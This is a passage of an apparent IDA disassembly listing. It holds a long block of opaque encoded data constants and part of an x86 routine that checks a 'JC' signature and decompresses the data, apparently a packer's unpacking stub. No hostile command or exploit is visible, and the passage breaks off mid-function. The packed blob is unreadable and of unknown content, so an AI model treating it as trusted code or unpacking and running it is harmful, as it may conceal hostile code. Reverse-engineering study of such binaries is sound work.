		dd 8C96CB7Dh, 67130EE7h, 215B2BAEh, 0A32F77E2h,	8303E0FAh
		dd 0D3ED7676h, 460DCBB0h, 92D66A1Fh, 7F8C7DE2h,	0C120D2B1h
		dd 0A1E60F4Fh, 0E04EED72h, 0A86BB43Bh, 3563FEF5h, 0D6A7DDD9h
		dd 0B15039AAh, 77D99EAh, 0C6A25445h, 8E8EAB73h,	0E7AFA678h
		dd 682C57F7h, 0AB925061h, 4C56DAB4h, 0AE54A704h, 0CCB424E0h
		dd 181A9D4Fh, 0CFE255FDh, 687DD6BBh, 0A2A29574h, 57CDC5DFh
		dd 0CFD84D18h, 5B4D5E99h, 8DC29F6Dh, 52E9A7E6h,	9C93AB53h
		dd 88EA649Dh, 0ABF83E8Dh, 3DF7C8E3h, 0FC573B5Ch, 0FDEECA49h
		dd 0ECDB3704h, 4079ED16h, 27CC912Ah, 0FA8A43F9h, 0E7B22212h
		dd 6810270Ch, 6B791174h, 9A53C5DBh, 75EFD030h, 25D1F85Eh
		dd 4D98592Eh, 0D4354E7Eh, 7D70B6C1h, 8CC0A70h, 27DFF83Ah
		dd 0C5D45A68h, 0CED8DF8Eh, 0F50B0BD4h, 8AAB5D3Ch, 87E145D5h
		dd 2E850F20h, 56A3B08Ah, 781A4ED1h, 41D2FA7Dh, 207114A6h
		dd 1A6A815Bh, 6411D577h, 0DD7F553h, 30E7BDDAh, 1A5AB2C5h
		dd 57E455EDh, 5F5FD469h, 0C188ECD3h, 0AAF37C17h, 521DA6FCh
		dd 0D19A672Bh, 0EC8A7B84h, 27D38EBEh, 385FA5A3h, 0DD75A22Ch
		dd 2D00EC35h, 0B92F634Bh, 964CB1C4h, 422CA9A2h,	217F52AAh
		dd 955FAAF0h, 39E5A2F7h, 0BD111576h, 4B1FEDAAh,	0E5FDDDDCh
		dd 0A799E50Bh, 381F55E2h, 0F307BD32h, 0E3EC7CF6h, 5B98A317h
		dd 0E1FA38ACh, 686E934Fh, 42AE1DE0h, 989AF13Bh,	0E5D96D9h
		dd 86EA78A9h, 50D99487h, 6BAD8CADh, 0A989368Dh,	0B81EA96Fh
		dd 84B5773Ah, 0DED8CF8Ah, 4D1CC912h, 9A7A9A7Bh,	0D370BD44h
		dd 0D1926EB0h, 0ED1729D0h, 12629DD0h, 5CEBBF96h, 65FEE136h
		dd 9378BA52h, 54240725h, 8960BAFh, 9858AB3Bh, 5BA8B198h
		dd 9AA9670Ch, 7F0A4C96h, 7197B1E5h, 0B2E8B4AAh,	4836CCEAh
		dd 6DEA97CFh, 0CB2DD725h, 0AA5C2542h, 7BFB6F9Ch, 8A675C7Bh
		dd 0C962239Eh, 0DFF28745h, 488E90C6h, 0E6FCB7C5h, 9F11FC16h
		dd 0BACA11B8h, 0AB0E46A9h, 0AFF9497Ah, 109A05A7h, 9F9DBAB9h
		dd 621DDFA9h, 588B6D9Eh, 3DF532F0h, 9BFFFAFEh, 1A2F620Ah
		dd 8D1F3D12h, 0D8A3495Ah, 4BEDF409h, 7D03E8E2h,	285C74D1h
		dd 0A53680B3h, 337A1B88h, 3F4772E3h, 0F391E430h, 8660FBA9h
		dd 4A2421E1h, 8D3E7ABCh, 9407DDF1h, 0FB575AFCh,	0B34B83E9h
		dd 41D5EA16h, 0ACAF9D5Dh, 5878AAC5h, 52C5E6E2h,	4D97BFE4h
		dd 65507A72h, 4F5E12B3h, 0DCF5527Eh, 567C8F60h,	0E9CF9F55h
		dd 0E15DAFF4h, 93FDB2D6h, 9A9B5660h, 75B2BFA3h,	131AB16Eh
		dd 0D065374Ch, 5D6E920h, 964F7DF5h, 976EC110h, 0B9D5DA21h
		dd 0ADAF7A80h, 15683388h, 535D5F06h, 0B64BED6h,	31FB7676h
		dd 0D2DBF01Ch, 0C16646C0h, 7A63CFC4h, 6AC28A8Eh, 7D421F53h
		dd 8AD65A8Bh, 1C66D1F1h, 0B62A674Bh, 3351C393h,	7D47AFE3h
		dd 0B834F32Eh, 0D8F3F492h, 9AFD05BCh, 0F38EB82Dh, 922A6385h
		dd 99D1B5FAh, 0B1DBBACFh, 4BA84624h, 0A1C265B4h, 827999CBh
		dd 9B5A1C7Fh, 0E521E272h, 69D72A59h, 85CBE4C8h,	0B59A4CFAh
		dd 0B37AEA0Ch, 68EE3C34h, 339DEA2Dh, 4FE11169h,	0F97F3252h
		dd 5D195E3Eh, 0FE4C8D17h, 0BFEEABE1h, 0A3B56E9Dh, 8B54C8FDh
		dd 0D8145077h, 9D599F34h, 10A8A07Fh, 720F9FB9h,	0EED1777Ah
		dd 886D929Ch, 13CF5572h, 0FB6E4741h, 0EF65010Ah, 0BAE3EDF2h
		dd 24A1796h, 8B0BDEB3h,	0BD0FB216h, 0D4EA5442h,	41D7C56Bh
		dd 8CFC491Fh, 0D08C41DCh, 6F0AC3E2h, 0CC6AA49h,	5B70EFAAh
		dd 1974C96Ch, 0F3AD6D2Dh, 0A2424A73h, 0C3F5E0F3h, 0FA8FAD0Dh
		dd 1BFC7737h, 0B1624EA9h, 7BFB1AEBh, 82F87AB6h,	0B6A014AFh
		dd 0D3D5635Dh, 28A86EFBh, 87AE66C8h, 0C36A6326h, 1B44D18Ch
		dd 1577624Bh, 4FE41667h, 8E155A70h, 498DFD58h, 68057213h
		dd 0EF494DFFh, 78294DDFh, 0BAC1055Dh, 3A4DF1E9h, 9B4EF0C9h
		dd 2D0A65A2h, 82DB03F2h, 2896125Fh, 0FBDE4B7Fh,	0A2B28C0Bh
		dd 0A7965CAh, 9FAC3A43h, 2F69639Bh, 9ED5F26Bh, 3E88BC8Dh
		dd 0BFFBF430h, 81E374DAh, 36BD687Ch, 6D677F99h,	9CC19235h
		dd 8D2EA73Ch, 0CAABD262h, 0AB9190FAh, 743764F4h, 54D483E2h
		dd 0C6F71127h, 0D6A5AAB5h, 0EAAEFA6Dh, 6897F72Bh, 3407699Dh
		dd 0B315CEFh, 7E7D207Ah, 0B9FBCEE0h, 0EA19A35h,	55CD2CB6h
		dd 4055137Dh, 33F5D8F6h, 0A35E4D51h, 0BB2C4755h, 0CF07B45Dh
		dd 0FE9C4CB7h, 8D439C9Dh, 0C3E726AFh, 0C39403FBh, 0F038FF8Eh
		dd 713B5222h, 372B7028h, 0B1B3317Eh, 4F568B26h,	0DCE55991h
		dd 3F462EAAh, 975A6C77h, 0E110EDEFh, 0B83A7295h, 0CB493B0Fh
		dd 6CC4E8FDh, 94681715h, 0E63CBCBh, 71F412AFh, 0A2EB909Ch
		dd 0D67FF6A5h, 7699C1FAh, 17ECAD6Ch, 64C0EB6Eh,	0CBE9B0B7h
		dd 0D395B279h, 4D77D017h, 0BEEB24FEh, 0FE4EC177h, 6C909731h
		dd 445295C8h, 37F57B55h, 2254895Fh, 4442B507h, 0F66066FDh
		dd 7E87BA8h, 1DC6D7D1h,	16E068AEh, 950819E1h, 0C8CEED7Ch
		dd 0BA38AF8Dh, 5BEEC6D1h, 812A341Fh, 0E1DA655Dh, 880BFD07h
		dd 8F1F2D6Ah, 0F44C7DF6h, 8FBFA591h, 41F448E4h,	3C3F81F1h
		dd 0F6FFD6E9h, 0E23B13D4h, 2ADC5F96h, 90AD9DC5h, 930599F4h
		dd 0C7F27B0Bh, 0C7BF9D57h, 0B55E5767h, 0C978BFBDh, 2A46D185h
		dd 7DED2E4Fh, 0CE5AAA8Dh, 0E91425A5h, 0E1AD3AD8h, 0F3B8AF03h
		dd 1360CE74h, 3E51DBA2h, 0B61E1939h, 0E0BA4C1Ch, 92375FD5h
		dd 0E189D334h, 4D9EFD98h, 1ED63269h, 0A2F7AAA5h, 716BC895h
		dd 0B651D3h, 0E71E1037h, 1FC5F87Eh, 0D2EA7CABh,	0E791A2E5h
		dd 28230185h, 1F3DC788h, 4FEFDF39h, 3F1D5EEEh, 0BAD174CCh
		dd 0D2007BB6h, 10EF01DFh, 7685CE27h, 0D99E3049h, 210FE2F8h
		dd 55EE0F36h, 1AC3C1EDh, 0A2F3493Fh, 0F55DFE78h, 15079E91h
		dd 0B6F701A3h, 0F64A28BAh, 11E43F27h, 15DC90CCh, 93C7EAA2h
		dd 51F55A9Fh, 40B99D97h, 555BCA73h, 3EC5F7C5h, 29DE5DA1h
		dd 0D5D3B637h, 626D4554h, 0EA6734AAh, 0E56AA7B3h, 0E6A1EF30h
		dd 7CF98B9Ch, 9268549Ah, 7EECCC5Fh, 0FE263595h,	50A68944h
		dd 2FB2B669h, 6A8693BAh, 0E6B21F82h, 55675D69h,	0D55721ECh
		dd 2FBFE0C3h, 1C80D824h, 0F01785DEh, 0A5F99DE3h, 607904D2h
		dd 0D9AACB2h, 4EB971D1h, 3A99B75Eh, 0C189D4FBh,	87239CCFh
		dd 0B628958Ah, 6A7D7171h, 0A91E9847h, 243F9C12h, 0A49858BAh
		dd 0DA171942h, 4FAF742Fh, 12EAC8B4h, 62849DA5h,	0D1096F1Fh
		dd 4AAE8DD5h, 2A2A76B3h, 45A47CA1h, 0AA6BBE97h,	732AFF48h
		dd 7D04A49Ah, 0E4228FFAh, 675D1D88h, 0CDD33BDCh, 0B66E9C23h
		dd 0DA8D7306h, 2C6E42B2h, 7A468CD1h, 4D144AF6h,	0A215F56Ah
		dd 4711043Ah, 0B8C46B46h
		dd 1627E526h, 0EDE192ABh, 7F45585Fh, 6C7CF7F4h,	0EFA4F9D2h
		dd 0D1FBF1D1h, 3D330F9Fh, 0F4AE55CEh, 71575CDAh, 91876ABFh
		dd 0BA969A5Bh, 5597515Dh, 4062D058h, 0D57DF789h, 3A78802Bh
		dd 5B6B7A1Ch, 0D257F628h, 0E9179FECh, 56382742h, 635557Bh
		dd 0C8AD786Fh, 0A7935B14h, 763DD367h, 64D6BFADh, 72DFFE82h
		dd 18186AEFh, 0AD3C9A77h, 0A9404749h, 9AEE6EFDh, 34452B03h
		dd 1D795F9h, 7D786507h,	9577F3B2h, 0AF4F6F50h, 6A8EF4E6h
		dd 73E64A49h, 1B00CE0Bh, 670F0BA6h, 9FCBADE2h, 3A26C445h
		dd 4F915122h, 440235CEh, 0B8671B4Dh, 5972C813h,	80452425h
		dd 0AB86495Bh, 2220CEDCh, 0D62EB751h, 992CEF12h, 0CFBAA52Dh
		dd 0AB0A2DA3h, 21A2F350h, 455551CDh, 6921B48Bh,	0BD9F4ABAh
		dd 0E192B0B1h, 0F6DDFD13h, 0DAD07745h, 754F2FE2h, 0F85CFCD8h
		dd 0DB2F6D2Bh, 4D2BCC50h, 7D21B3CFh, 1F6D056Fh,	6A5C9F33h
		dd 760746E7h, 0B754AC2Ah, 39ABD571h, 7E02DFDAh,	0FC2BB698h
		dd 0B0E59CA6h, 0D42B13EDh, 0AA7BB164h, 0C031548Fh, 3C420D62h
		dd 731494D9h, 983A177Ah, 0DE1B4DA9h, 85FAA574h,	0D5815D47h
		dd 53BA42DBh, 0F3DCF795h, 526BAF14h, 0D56E6E94h, 3D26D150h
		dd 0E99B6CA0h, 8E5F1EEFh, 99D2414Ah, 5F3A20FBh,	0C0A3C90h
		dd 3420ABA9h, 9B65A07Bh, 2BCB61FFh, 0A2B8E86Ah,	0DF81E0F8h
		dd 97EB1ECFh, 0B8C8A2DAh, 43FDFFEEh, 81969DA3h,	0AEAA915Bh
		dd 68F73534h, 2F003B49h, 0E8EEF83Eh, 622774BEh,	11DEB214h
		dd 83106B71h, 17670928h, 2DB667E6h, 0D9BAB797h,	0D5E18ACEh
		dd 4AAA4B44h, 215E0C9Ah, 25D1B104h, 3986CB6Eh, 0CF196FA8h
		dd 9A7D568Ch, 50BD1B89h, 927D0FAh, 0E1182343h, 0BE444267h
		dd 0E4D9FA2Dh, 0D5C315D6h, 0B972472Eh, 0A3A8F0F7h, 7A93BCEEh
		dd 711D3B71h, 2FD0F656h, 0FF0748C1h, 62F7BECAh,	327153E0h
		dd 78172BAh, 0D59D096Eh, 4F9683BFh, 0D15DFEFCh,	48FC771Fh
		dd 0A95D5BC9h, 6256AF63h, 0BFCD53FAh, 0EC320D9Bh, 39BFB1F5h
		dd 80E30270h, 5878E7C2h, 3502772Dh, 0A401997Fh,	3341F372h
		dd 0E6D87F7h, 3150DC3Ah, 0BABB6DDAh, 2F069A67h,	0FC6C8BBh
		dd 0C200CF6Bh, 39E1E6BBh, 0FD37AEC6h, 6AD6F8C6h, 49BA0D1Fh
		dd 99873AF5h, 4496EA5Fh, 42D17DB2h, 0B2FCEB9Fh,	72D6AD1Bh
		dd 0D4165B4Bh, 0EC3F09D0h, 540C2AEEh, 1B391564h, 41EEC81Fh
		dd 0AAEF81EFh, 0E7A7D1A8h, 2A8AD015h, 0E65150B0h, 56F19B3Ch
		dd 0BEA9AB47h, 28B97591h, 0DA499513h, 1726DB54h, 9772DF59h
		dd 44632C56h, 0A89AFF0Ch, 0F416FD73h, 2FD381EEh, 0F254BACBh
		dd 8A35D94Dh, 0A8C72ACEh, 219C8B00h, 5E7CDBA1h,	0D1B32D9Eh
		dd 0EBAF554Ah, 7F653935h, 17FD7CC7h, 79F56A90h,	0B7CD71E8h
		dd 3E506B0Eh, 7095D8C6h, 0B8CDB4B8h, 5E2CC937h,	0BF968BA1h
		dd 5C4416B1h, 0E79B4228h, 0A8E5B470h, 0A0F90BE1h, 21F7F1A8h
		dd 0F03F61CEh, 0ADEBEBEFh, 83EA38FAh, 709318EFh, 0E2961AD6h
		dd 0D1993706h, 26ECEF8Fh, 4BC98EFDh, 9DEAB114h,	61A61D53h
		dd 5ED12EFDh, 0F1394CB5h, 0FBF74FBh, 0ECD955FCh, 0E0898553h
		dd 18B597D9h, 11416CB7h, 0C5D2B83Bh, 9F1295FCh,	0B0C425C6h
		dd 0B5A46694h, 6456795Fh, 7F8EF2EDh, 8D392FEDh,	0A9EFD1DCh
		dd 0C04C8EA4h, 0F9EE74DAh, 7D37A264h, 0FD2B804Ah, 93962EB4h
		dd 0F976FD23h, 0CB72884Eh, 131BDFD3h, 0CCA454BAh, 0FDB8CC4h
		dd 8AB87F5Ch, 4F765D76h, 3CD4C1DCh, 2629E395h, 0D6194870h
		dd 3F5AD0F7h, 9F3B8FE9h, 55C5F7F9h, 0CB3C4371h,	0A0D97CE1h
		dd 0AFE0DDDFh, 0BC4636h, 4649D570h, 0EEB280E4h,	0CB3C81E4h
		dd 5BB9DB5Bh, 0E0C9474Fh, 0FDB19E17h, 0F37560F9h, 17F87F4Fh
		dd 54C210AAh, 0EE65E9E1h, 5FC3AEE3h, 0C0CCEF72h, 53216E29h
		dd 0B189EE4h, 3666339Eh, 9DB7E40Ah, 1E234CF8h, 861A41D9h
		dd 0C4D5FA56h, 3494A18Dh, 0DD757D07h, 0F01EC9AEh, 7CC1C074h
		dd 0B3DFE479h, 4FD259BAh, 7E34280Dh, 54665A87h,	49FDE117h
		dd 0FC4A7CB5h, 4C772D4Eh, 0E7121FE9h, 299FC8F9h, 195AD692h
		dd 0DE47CDB0h, 0B856C2B5h, 0D93DFC0Eh, 155748Bh, 0C5B3EE85h
		dd 5F62817Ch, 8A49872Eh, 86B5A146h, 219B3330h, 0ED91F376h
		dd 4E161905h, 5018309Fh, 8E26E9B4h, 2973162Ch, 0A0CC30FBh
		dd 2D30BF8Eh, 0A69EF1DCh, 3187B7Ch, 1785737Ah, 6FF31AC5h
		dd 9E8CC8E6h, 712B8C99h, 0BE15C4C3h, 0CE4858D5h, 7D3CFDE5h
		dd 0F1DBBB90h, 0F0CBBEC3h, 0D6F7A53h, 0A9CC5126h, 38EFA438h
		dd 398A5466h, 8EC6B51Ah, 9AD2B726h, 92F5E972h, 0C4571DAEh
		dd 66417EADh, 0A4317499h, 38FC8B91h, 86B3303h, 2482BF30h
		dd 0E51DACEBh, 0F7096EBCh, 5F662447h, 65AF5CFFh, 0A3D42E95h
		dd 0D78A933Fh, 0A9DE8A0Ch, 736EF0D2h, 5C0D83D4h, 0FCF9EC2Ah
		dd 0ECEAB632h, 0C6338A58h, 8AE1EBC0h, 8CE14E99h, 0DAA845DFh
		dd 0C8CD6FEAh, 0D6D749CFh, 65D91CEFh, 105C54DBh, 0D64D4533h
		dd 12620679h, 0F81F522Fh, 0B4B13090h, 0A5BE2276h, 0C13E4663h
		dd 0DAFF29D2h, 77F76E17h, 4BEB4CBAh, 78B5C5FAh,	0EAD48743h
		dd 0FE5DC8DAh, 0AC363F07h, 370FF97Ch, 5133BC0Fh, 317A709Ch
		dd 0B1048DD9h, 3E18BC6Bh, 4EE3B46Fh, 0ABC65918h, 0BFD72C00h
		dd 0BD2971D8h, 16F6C7D1h, 90EDDE85h, 91D26792h,	0D58967A3h
		dd 6F13B665h, 0B5527A99h, 0B2BF8912h, 8408607Fh, 0ABFF7D82h
		dd 1DC7B1FBh, 776497D9h, 5318348Ch, 0EE3FC2Bh, 303FF613h
		dd 0EF4B4F6Ch, 0F5452BE5h, 1D275D81h, 4883761Fh, 0F4B382B8h
		dd 27C35791h, 0EFEF2A2Fh, 5DF4DF67h, 563A73AAh,	5CED4D58h
		dd 0CFEF591Eh, 87E6A333h, 81828BA1h, 478B5456h,	0C18451BBh
		dd 93B2C35Fh, 0A86EE73Eh, 8B67973Fh, 0D9DD70Ah,	78EAF12Bh
		dd 8D7DF5BCh, 69DC557Ah, 3A855262h, 779CF976h, 3FE5F17h
		dd 439DEE89h, 498F83EAh, 0E084F286h, 6F84E383h,	0C048E2F8h
		dd 549C10Fh, 0BD98214Ah, 6AD9F3C6h, 95D2CBFFh, 0CB630F2Bh
		dd 7525AEF2h, 0B77E6178h, 0A68E0AA0h, 85353FB9h, 76C5BE71h
		dd 3F5B1B13h, 0CF6AF570h, 0BC929D7Eh, 0A17F69E8h, 7AABDB75h
		dd 0E7BB9506h, 735D81E0h, 0B77D14A5h, 0A7D42E76h, 0AE3C0843h
		dd 0C98DC0F2h, 928779ADh, 0DED7D21Bh, 0E686C197h, 74F3B303h
		dd 75855E39h, 89851CF7h, 24827385h, 75171B33h, 67D60A6h
		dd 0B4BB57B4h, 0F4FC0061h, 0C2B24CFFh, 0FD89A128h, 0EAE0B36Dh
		dd 5E1A5368h, 2A745C62h, 7EA0A933h, 591779D2h, 6598750Ch
		dd 0D324778Dh, 8267A932h, 0E4B06A34h, 0D165F366h, 29757E24h
		dd 740BC1Bh, 1F586B6h, 877969E1h, 0D6A25E8Dh, 51580F6Eh
		dd 8E1D3760h, 0C25B311Dh, 9FE0E18Fh, 91A60557h,	3F50EDA1h
		dd 0DF86E33Ch, 7ED8CFA7h, 985C4ECBh, 0FC131C4h,	7B3C5C23h
		dd 0B67CCE0h, 0B18C7B1Ch, 617DBA8Eh, 7B203785h,	0DD791BFh
		dd 2FA5C7D3h, 0FE2B81AFh, 598E2AA5h, 515B0FC4h,	920787FDh
		dd 2767BEBEh, 0FE5A3C30h, 9B88DAB7h, 7F1DB18Ch,	3EA1B30Dh
		dd 650B0D4Bh, 2C0E7D4Ch, 511EBB11h, 0BE5A36A7h,	1C20322Eh
		dd 41CE0453h, 0F9DBDABh, 77510FAEh, 2BCE170Ah, 0EDE37C72h
		dd 0FCF16177h, 64B8A80Ah, 4C76278Fh, 0D12E0C95h, 0EEED7B3h
		dd 0AEC70415h, 9731FCA3h, 0F66145FAh, 82AE9460h, 0DAD81768h
		dd 0BBEBEDC9h, 9EF3199Ch, 0FA882E05h, 4B4CF12Fh, 610FF8ACh
		dd 0BA0C161Fh, 0AA7CC1E8h, 48C4590Ah, 9E29941Bh, 9A831D99h
		dd 0CAFB3ED0h, 349DE6E0h
		dd 0B3594C39h, 0DD49E07Dh, 0C313FD8Dh, 77B95054h, 0C33EC7F0h
		dd 5018FB6Bh, 0AA4BABA6h, 94ECB45Bh, 0E531AE55h, 0FCF0A0Bh
		dd 0E24A95BCh, 0BD2D4B0Ah, 852C5554h, 0B9EDEEE2h, 0CBFE2E6Ah
		dd 0F0D82CAh, 7454EF17h, 2E3FFC26h, 0E1C83579h,	17B63237h
		dd 0C338E8BAh, 0EDFA0655h, 7F7349F4h, 0EEAD03F2h, 0A4ADC795h
		dd 3E9C15A8h, 2BD252F0h, 0FB2A71Fh, 772C7D58h, 3FACD505h
		dd 0FC2FE153h, 0E9DB5BD6h, 0B03F6B2Dh, 76FAB5D7h, 0C02D0AADh
		dd 0EA9FC981h, 1F4F26FDh, 0EB19CCD3h, 7A1ECC8Dh, 0BF88E52Bh
		dd 0F5FCA6DCh, 0D8E0BFCBh, 37F62FC2h, 0CEB52E90h, 0FC639CAFh
		dd 0AF077D2Ch, 6802F2B7h, 0FD9FD62Eh, 0AEF1B865h, 3E47A3DCh
		dd 0FA930573h, 0E64317Ch, 0E44E4396h, 0E6336D5Ah, 741E159Ch
		dd 0F69292Fh, 15ABD954h, 882EAE78h, 0C83418BFh,	0E0485A6Eh
		dd 7B200A46h, 9ABBD29Bh, 0A6C101B5h, 0AAEF56FBh, 957180E1h
		dd 4F6920EFh, 9775158Bh, 68936F0Dh, 72C0D607h, 0F543FB9Ah
		dd 1521BB28h, 0DBE4CED2h, 581F22D1h, 0DF7345E3h, 0AAEE4707h
		dd 0C5AD7CE7h, 5B1309FEh, 1B43565Ah, 78045469h,	4BC5F3E9h
		dd 454BA261h, 9EB12E3Ch, 7F505FB3h, 0AE2ACC54h,	8E99CFC4h
		dd 26C5EAB2h, 0DFF53CE3h, 74AE5EC7h, 362EB434h,	548DD97Bh
		dd 4EBA123Ch, 92CFF7C2h, 0C5D2F5F7h, 7009731Ch,	0AEA438EFh
		dd 0C9CD6C95h, 3A03B68Eh, 0A2A5B59Dh, 0D75508ECh, 494F57AEh
		dd 135F2D5Bh, 176DC43Fh, 6078EBBAh, 0A53766EFh,	0FDEAD198h
		dd 5D19BE5Fh, 0AD7D8B40h, 0EC796A43h, 0E9C37B50h, 5806DCB6h
		dd 0FC429AAAh, 0A29402F1h, 0DEE1BEABh, 0F9C612FBh, 0BF75F84Ch
		dd 6750555Bh, 0ED67DD1h, 0D1285CB6h, 204A2446h,	30D1C451h
		dd 89B66CA4h, 5666476Dh, 7F1EF637h, 4642D9C8h, 294738C7h
		dd 3A15609h, 3B8E35A5h,	0E2832B95h, 64BA296Bh, 59856E59h
		dd 743EFC41h, 38EA2298h, 7D89FD63h, 0ADB24C55h,	0A2121B6Eh
		dd 242550ECh, 0E0786723h, 0EF2239C8h, 0B809B5FFh, 12B6E421h
		dd 23A212FEh, 0A4ABE59Bh, 9E3DABCCh, 0D1DDA37Ah, 2527357Ah
		dd 1AEA57C5h, 906338Eh,	0B698D91Ah, 1A3829CAh, 0BAC12FDBh
		dd 5AB83720h, 1DCE3BA9h, 0BA97D81Eh, 0EBB1CF45h, 186EE5F5h
		dd 0A5DD1D70h, 525572FAh, 112C31A3h, 445DDD66h,	76C9966Bh
		dd 2254F76Ch, 76B6BB95h, 19599D81h, 988D47B7h, 66B6CD76h
		dd 856D53B4h, 0BD02DA6Ch, 53D4E896h, 11A62F3Dh,	0DC23B88Dh
		dd 0E524A316h, 59696628h, 0C3F0AAEAh, 63629FBFh, 2D1D3618h
		dd 6ED0E5A2h, 0FA615F9h, 2307DC32h, 54C0A52Bh, 99E54F6Dh
		dd 0C2DA39C1h, 10AEDE01h, 0DE0A4F28h, 0E3235005h, 0DCE384AFh
		dd 0BB4CF5C2h, 6ABBA80Ah, 0A738F432h, 0D3AB4644h, 88D186B6h
		dd 0BFBD9321h, 0A1E7510Dh, 16CF1228h, 9D947614h, 330F4149h
		dd 0F6C42A3Ah, 0A45B2751h, 19F63B0Fh, 0E5E5246Bh, 0D1647298h
		dd 0FE1764D8h, 483274C5h, 6C74FE56h, 0E08C0EF8h, 0E2FEC99Ah
		dd 6078DD2Ah, 0ED8DDD92h, 16698F8Bh, 8AB2A2FDh,	0B90763ACh
		dd 0A2BBAE34h, 7D51BCBh, 433825A6h, 0E62E72CCh,	193A0B91h
		dd 0A733FC77h, 7E8DF34Dh, 0ED44A4B2h, 8DA9910Eh, 3810D85Eh
		dd 6DD2F1C3h, 6AF71C3Ch, 278EA9BEh, 5A230E48h, 1679C4B2h
		dd 37BFB43Fh, 10BA6D78h, 394A9F70h, 4E299899h, 8CDC563Bh
		dd 0AB8E4BACh, 9145D076h, 0E6978537h, 7926AD31h, 73E71394h
		dd 5F7608D6h, 0BF0D7EFBh, 353DBFAFh, 83D3D7EEh,	0A7D9D307h
		dd 3CA7418Dh, 74224BFAh, 0F5D8BB70h, 7309766Dh,	0ED42122Ch
		dd 0CAF65FA3h, 0AEAE391Ch, 72155C77h, 0FEF6C170h, 59C6CCB2h
		dd 7B4C2F80h, 19DAFB3Bh, 8F4EB3DFh, 9084F4D4h, 0A9BB2AF4h
		dd 143FAFEBh, 95B4972Bh, 477C190Eh, 8DF8E4DBh, 0DD4CD90Bh
		dd 6B5426Eh, 0AC8E4CAAh, 31AEF76Eh, 0EE07D67Bh,	0CFC19BB9h
		dd 0F5E1E716h, 64450A17h, 4FFECE62h, 0D229FC7Dh, 1CE79E64h
		dd 95BFFBAAh, 3D5C33F3h, 0DFC775A3h, 28FDBCEFh,	6C95D682h
		dd 0D3C01AF4h, 14FFDBEFh, 0E68CFBEFh, 7F4985CDh, 9D143F19h
		dd 292D3F2Ah, 6D0E45F0h, 0DC31263h, 0A713437h, 15545522h
		dd 8E0754F3h, 0BDCB10C8h, 3E8DE513h, 0CECBA730h, 72A758FEh
		dd 7E2BA47Bh, 57D3FD28h, 1138032Dh, 0D3F13BADh,	0E8B6C94Fh
		dd 3F11165Ah, 0B8F8CA34h, 570B82FEh, 8F5E3691h,	0B55C7A59h
		dd 1AAA4CD3h, 6FBD5F52h, 2C10985Ah, 0BC16583Ah,	0E99B2E3Dh
		dd 3DE77F54h, 0ABBBBB95h, 790DFDDDh, 0FF6D02FCh, 58C6EFC9h
		dd 35377120h, 0AFB9770Eh, 0CA661F2Fh, 0CFF566B4h, 2EF07FEFh
		dd 7D17DE3Fh, 0C9F01F3Bh, 2BD7F364h, 0D9E4A49h,	0A6FBB366h
		dd 510D5F7Ah, 0E85F5395h, 953C5BFBh, 98BFB740h,	10B29C96h
		dd 0A6BF5086h, 0B9F1EC1Ah, 896C06AAh, 0D7D9A2BFh, 1729A900h
		dd 0E6712EEh, 0D909281h, 0BA708363h, 239DF44Bh,	0AAD1A482h
		dd 563C7D28h, 25F17DF2h, 21162CC6h, 20E45BC4h, 5E0CCD3Bh
		dd 0BC471618h, 0B0A4FE90h, 7780F8EBh, 0C6FD7FB8h, 9ADAF6B8h
		dd 3F0DEBEDh, 2630DCB4h, 0B76B7E72h, 0FBF13E6Ah, 9C52B71Fh
		dd 0C0FE95D6h, 5FEE2D6Ch, 675CFE55h, 0A53D340Bh, 0AE94A6B2h
		dd 0B38CA657h, 3B07A44Fh, 0E58B829Bh, 0F2AA421Dh, 4C50D131h
		dd 0A547h, 29DD0000h, 2
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_48930E	proc near		; DATA XREF: sub_48F057+3Ao

var_11		= byte ptr -11h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048948D SIZE 00000004 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cld
		push	ebx
		push	edi
		push	esi
		mov	[ebp+var_4], eax
		mov	[ebp+var_8], edx
		mov	esi, eax
		mov	edi, edx
		cmp	word ptr [esi],	434Ah
		jnz	loc_489450
		add	esi, 0Ah
		mov	[ebp+var_C], 8
		xor	ebx, ebx
		mov	edx, 80000000h
		inc	ebx

loc_48933F:				; CODE XREF: sub_48930E+46j
					; sub_48930E+8Dj ...
		xor	eax, eax
		call	sub_489457
		jnb	short loc_489356
		mov	ecx, [ebp+var_10]
		call	sub_48946F
		add	al, [ebp+var_11]

loc_489353:				; CODE XREF: sub_48930E+65j
		stosb
		jmp	short loc_48933F
; ---------------------------------------------------------------------------

loc_489356:				; CODE XREF: sub_48930E+38j
		call	sub_489457
		jb	loc_4893F8
		call	sub_489457
		jnb	short loc_4893C3
		mov	ecx, 4
		call	sub_48946F
		dec	eax
		jz	short loc_489353
		jns	loc_489442
		call	sub_489457
		jnb	short loc_48939D
		push	ebp

loc_489383:				; CODE XREF: sub_48930E+8Aj
		mov	ebp, 100h

loc_489388:				; CODE XREF: sub_48930E+83j
		call	sub_489464
		mov	[edi], al
		inc	edi
		dec	ebp
		jnz	short loc_489388
		call	sub_489457
		jb	short loc_489383
		pop	ebp
		jmp	short loc_48933F
; ---------------------------------------------------------------------------

loc_48939D:				; CODE XREF: sub_48930E+72j
		mov	ecx, 1
		call	sub_48946F
		add	eax, 7
		mov	[ebp+var_10], eax
		mov	[ebp+var_11], 0
		cmp	eax, 8
		jz	short loc_48933F
		call	sub_489464
		mov	[ebp+var_11], al
		jmp	loc_48933F
; ---------------------------------------------------------------------------

loc_4893C3:				; CODE XREF: sub_48930E+58j
		mov	ecx, 7
		call	sub_48946F
		push	eax
		mov	ecx, 2
		call	sub_48946F
		mov	ecx, eax
		inc	ecx
		inc	ecx
		pop	eax
		or	eax, eax
		jz	short loc_4893E5
		mov	ebx, eax
		jmp	short loc_489443
; ---------------------------------------------------------------------------

loc_4893E5:				; CODE XREF: sub_48930E+D1j
		cmp	ecx, 2
		jz	short loc_489450
		inc	ecx
		call	sub_48946F
		mov	[ebp+var_C], eax
		jmp	loc_48933F
; ---------------------------------------------------------------------------

loc_4893F8:				; CODE XREF: sub_48930E+4Dj
		call	sub_48947B
		dec	ecx
		loop	loc_489409
		mov	eax, ebx
		call	sub_48947B
		jmp	short loc_489443
; ---------------------------------------------------------------------------

loc_489409:				; CODE XREF: sub_48930E+F0j
		dec	ecx
		mov	eax, ecx
		push	ebp
		mov	ecx, [ebp+var_C]
		mov	ebp, eax
		xor	eax, eax
